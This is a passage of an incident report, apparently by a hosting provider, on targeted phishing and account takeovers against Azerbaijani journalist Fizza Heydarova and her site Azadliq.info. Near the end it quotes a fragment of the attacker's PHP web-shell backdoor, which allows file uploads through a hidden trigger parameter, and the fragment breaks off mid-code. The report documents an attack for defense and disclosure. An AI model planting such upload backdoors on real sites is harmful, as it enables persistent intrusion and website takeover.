During the past year Qurium has recorded an increase of targeted phishing attacks against against independent media and human rights activists in Azerbaijan. The attacks are launched from infrastructure in the country with total impunity.

Saytların yığılması

The story of Fizza Eydarova, editor of Azadliq.info, is an example of how phishing attacks against regime critical journalists and human rights defenders in Azerbaijan are getting more targeted and sophisticated. Additionally, phishing attacks are being launched from IP space belonging to AzerTelecom, one of the country’s largest Internet provider, with total impunity.

The attacker targeting Fizza used several attack vectors and managed to compromise her Gmail account, and gain access to her WordPress account with Azadliq.info. In an attempt to ensure persistent access to the website, the attacker installed multiple backdoors on the site. However, all attempts to access the backdoors were blocked by Qurium, hosting provider of Azadliq.
The attacker also carried out multiple attempts to compromise Fizza’s Facebook account, including sending fake SMS impersonating Facebook redirecting her to a fake Facebook login page.

The number of attack vectors used, and the fact that the attacks were carried out during several months’ time, shows a certain level of dedication and determination.  The attacks have been carried out from IP address 134{.}19.217.249, which is the same IP address used to launch attacks against other independent media in Azerbaijan in the past, including Qurium’s core infrastructure.

This report summarizes the case of Fizza Heydarov, editor of Azadliq.info, one of the multiple cases we have investigated.

The 22nd of April 2019, Fizza Heydarov editor of Azadliq (Azadlıq Qəzeti) reported:

“DURİNG MY TWO YEARS ON FACEBOOK, I HAVEN’T HAD ANY SPECİAL ACTİVİTY. I LİKED WHAT MY FRİENDS WROTE, AND I RARELY WROTE ANYTHİNG. TODAY MY ACCOUNT HAS BEEN HACKED TWİCE AND MY PASSWORD HAS BEEN CHANGED. IN BOTH CASES, I MANAGED TO RECOVER İT.”

Fizza reports on Facebook that her account has been hacked.

In April 2019, Fizza received a warning by Facebook that the account was being accessed from the IP address 134{.}19.217.249 from AzerTelecom.

Warning from Facebook, access from unknown IP address.

The attacker had gained access to Fizza’s Gmail account and was resetting the password of her Facebook account. Once the attacker accessed the account, he tried to change the recovery e-mail to fizze.heyderova.16{@}bk.ru.

The attacker enters azadliq.info website

With access to the editor’s Gmail account, the attacker searches the inbox and finds a mail containing the credentials to Azadliq.info’s website. The 23rd of April 2019, the attacker accessed the admin area of the website using a Tor exit with IP address 65{.}19.167.132.

“65.19.167.132” “” “-” “23/Apr/2019:10:08:28 +0000” “1556014108.286” “GET” “/rightxxxx” “Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0”

Soon after, the attacker installs a backdoor on the website. He steals the code from an old backdoor of 2017 from the defacer “Aissa Wolf1200”.

set_time_limit(0); error_reporting(0); if(isset($_GET[“rhs334″])){echo””.php_uname().””;echo””;echo”
“;if($_POST[“v”]==up){if(@copy($_FILES[“f”][“tmp_name”],$_FILES[“f”][“name”])){echo”berhasil–>”.$_FILES[“f”][“name”];}else{echo”gagal”;}}} if(get_magic_quotes_gpc()){     foreach($_POST as $key=>$value){         $_POST[$key] = stripslashes($value);     } } echo ‘ index.php

24saat.org

Mənbə – azadliq.info

Saytların yığılması